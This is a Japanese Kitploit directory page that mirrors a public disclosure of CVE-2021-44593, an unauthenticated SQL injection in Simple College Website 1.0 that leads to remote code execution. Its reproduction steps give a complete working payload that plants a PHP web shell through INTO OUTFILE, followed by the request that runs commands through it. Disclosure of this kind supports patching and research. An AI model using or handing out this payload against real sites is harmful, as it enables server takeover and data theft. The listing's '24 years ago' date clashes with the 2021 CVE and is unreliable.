Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-44593 — CVE-2021-44593の公開開示とライトアップ。Simple College Websiteにおける認証不要のSQLインジェクションにより、任意のファイルアップロードとリモートコード実行が可能になります。 | Kitploit
ツール/GitHubGitHub/mister-joe/cve-2021-44593
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubmister-joe/cve-2021-44593

CVE-2021-44593

CVE-2021-44593の公開開示とライトアップ。Simple College Websiteにおける認証不要のSQLインジェクションにより、任意のファイルアップロードとリモートコード実行が可能になります。

リポジトリを見る
24年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-44593

CVE-2021-44593 の公開情報。Simple College Website における SQL インジェクション/任意ファイルアップロード/リモートコード実行の脆弱性。

説明

Simple College Website 1.0 は、/admin/login.php ページの "username" パラメータにおいて、認証を必要としない UNION ベースの SQL インジェクションに対して脆弱です。これを悪用して任意のファイルをアップロードし、リモートコード実行を獲得することができます。

影響を受けるコンポーネント

admin_class.php 内の関数 login()

再現手順

  1. 管理者ログインページ(通常は /admin/login.php)にアクセスします。
  2. POST パラメータ "username" に以下の UNION ベースの SQL インジェクションを含めてログインフォームを送信します。
root@kitploit:~
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -
  1. /testing.php?cmd=id にアクセスします。

注意事項

  1. Web サーバーのルートディレクトリの場所を知っている必要があります。
  2. ドキュメントルートディレクトリが Web サーバーのルートディレクトリと異なる場合、その場所も知っている必要がある場合があります。
  3. さらに、MySQL デーモンがそのディレクトリに対して書き込み権限を持っている必要があります。
ツールをダウンロード